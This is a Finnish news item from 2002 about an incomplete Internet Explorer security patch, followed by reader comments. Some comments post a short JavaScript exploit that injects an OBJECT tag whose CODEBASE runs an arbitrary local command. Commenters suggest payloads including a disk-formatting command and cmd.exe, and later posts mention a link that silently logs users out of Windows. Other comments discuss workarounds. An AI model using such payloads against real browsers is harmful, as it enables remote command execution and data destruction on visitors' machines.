|
Torstai, 14.2.2002 IE:n korjauspaketti ei tilkitsekään kaikkia luvattuja reikiäMicrosoftin maanantaina julkaisema Internet Explorerin korjauspäivitys ei tilkitsekään kaikkia luvattuja tietoturva-aukkoja. Korjauspaketin luvattiin paikkaavaan kuusi aiemmin paljastettua IE:n tietoturvareikää, mutta Newsbytes-uutispalvelun ja riippumattomien tutkijoiden testien mukaan päivitys korjaa kaksi reikää vain osittain ja jättää yhden aukon täysin avoimeksi.
Lue juttu K2, 14.2.2002 00:18. Lähde: SecurityFocus
|
|
Anonyymi kommentoija, 14.2.2002 08:44:37
Ei tässä touhussa ole todellakaan mitään järkeä.
Uutta windowsia tehdään jatkuvasti, eikä edellisiäkään saada kuntoon. Bugi/aukkokierre jatkuu jatkumistaan.
On se nyt kumma etteivät sitten ole voineet ilmoittaa rehellisesti, että yksi reikä on vielä paikkaamatta, mutta homma on työn alla. Jokainen tapaus jossa M$ todetaan valehtelevaksi osapuoleksi, aiheuttaa yritykselle huomattavasti hallaa. -Okei, se on iso yritys ja sillä on melkoinen markkinavalta, mutta ei sekään tällaisella pelillä voi ikuisesti jatkua.
Hyi hyi, M$!
bungle, 14.2.2002 13:04:10
<script>
var x = window.open();
x.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="{ tähän komento, joka halutaan ajaa }">';
</script>
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Logica, 14.2.2002 13:16:21
var x = window.open();
x.document.body.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="{ tähän komento, joka halutaan ajaa }">';
</script>
Eikai toi voi toimia niin simppelisti että CODEBASE="{ command format c: }" ?
Jestas...
bungle, 14.2.2002 13:46:57
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Anonyymi kommentoija, 14.2.2002 17:18:22
karipk, 14.2.2002 17:54:30
c:/winnt/system32/cmd.exe
Anonyymi kommentoija, 14.2.2002 18:38:36
c:/winnt/system32/cmd.exe
Anonyymi kommentoija, 15.2.2002 00:12:10
Anonyymi kommentoija, 14.2.2002 23:20:27
cmd /c dir c:\ && pause
Logica, 14.2.2002 18:26:18
c:/winnt/system32/cmd.exe
iguana, 15.2.2002 17:55:27
c:/winnt/system32/cmd.exe
bungle, 14.2.2002 00:29:27
Workaround Suggestions: Disable ActiveScripting, use Netscape on untrusted sites, browse trusted sites only, do not allow ActiveScripting to be parsed in emails or newsposts
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
Logica, 14.2.2002 09:09:28
Kun tuolta löi päälle disable activescriptingin tai paremminkin pistin että "prompt" niin eikös jokaiselle saitille mentäessä ie mankunut että "scripts are usually safe, do you want scripts to run?" Poisti tosin ongelman kun poisti scriptit mutta....
heko, 14.2.2002 13:01:58
"Scripts may have security implications, but some pages will not display correctly if you disable scripts. Do you trust the scripts on this site?"
Sisällöltään tämä olisi jo vähän kattavampi, vaikkei ehkä muotoilultaan.
Heikki http://www.heikkikorpela.fi heikki@heikkikorpela.fi
bungle, 14.2.2002 13:08:19
"HTML embedded scripts are allways safe, but because you are using Internet Explorer nothing can be said for sure on this matter."
"See the animal in his cage that you built, are you sure what side you're on?" -- Trent Reznor
iguana, 14.2.2002 17:51:22
Ainakin ton kaverin testit tuntuu toimivan paremmin kuin hyvin:
http://www.osioniusx.com/
Zemial, 20.2.2002 15:32:39
Linkki näyttää harmittomalta linkiltä kuvaan, mutta kirjautuu kivasti ulos winkkarista.. jee..
Zemial, 20.2.2002 15:43:45
ja kyllä lähtee..